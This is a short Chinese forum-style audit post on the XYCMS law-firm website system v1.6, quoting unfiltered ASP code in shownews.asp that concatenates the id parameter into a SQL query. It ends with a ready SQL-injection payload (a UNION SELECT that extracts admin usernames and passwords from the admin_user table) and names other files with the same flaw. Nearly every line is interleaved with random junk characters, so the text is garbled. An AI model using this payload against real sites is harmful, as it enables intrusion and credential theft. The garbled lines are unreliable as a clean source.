前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似6 [- f T( \- l$ i- q* t2 k6 z! g5 @
$ v5 t0 } l6 L- q- V$ _% ^淫荡分割线- [. x" {& r, |0 ]+ E3 H6 j
--------------------------------------------------------
4 d' C D/ |( D9 G6 S' V- V! r 8 s& l9 S( S4 ?4 O5 _
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
8 |+ H3 f0 e+ z+ e, J, s源码地址:http://down.chinaz.com/soft/29233.htm
5 U {- q6 q0 w0 k" b3 U4 g 1 \8 c( d' `, O$ Z7 M) J. E4 Y
漏洞文件:shownews.asp4 G, |: G% l3 p t. s3 N: X: j" }
漏洞代码:7-13行6 U+ q: g0 @- Z
: ~+ q: H6 V) z1 n3 }
! W* n2 I# |5 G, b( t( j2 e o<%
# ` J; p- }1 d. Q3 _/ y) C8 ?id=request.QueryString("id"), {; v/ s# v1 P
$ C$ Z7 x0 D e) P8 ?7 a
set snews=server.createobject("adodb.recordset") 7 _: @4 S+ ]5 V8 w
exec="select * from [news] where id="&id
( X8 ~/ Y& W! y8 ysnews.open exec,conn,1,1( z1 i* s& J2 r' |6 R. z
%> y5 B) ~- y# F- Z, a& z" W$ H
6 t' e. s; {7 R
: K( f4 |" Y' G3 C+ [什么过滤都没有 直造成注入, l. [1 E* _5 ]/ B
% g2 O( O( F& ~% n注入点:http://127.0.0.1:99/shownews.asp?id=xx# h2 G0 l0 G( e& ?7 L
, ^' j8 H* k2 Y( k7 ?
其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
8 [6 ]# m/ w) _0 \ 7 U4 E/ b) I" E3 o$ v2 N5 ~4 q
5 m7 e: i/ M/ U: P" _; |5 O4 f
exp: union select 1,admin,password,4,5,7 from admin_user
9 w0 h ?1 V% T- C* N7 \9 a* v5 |2 {& }" ~
|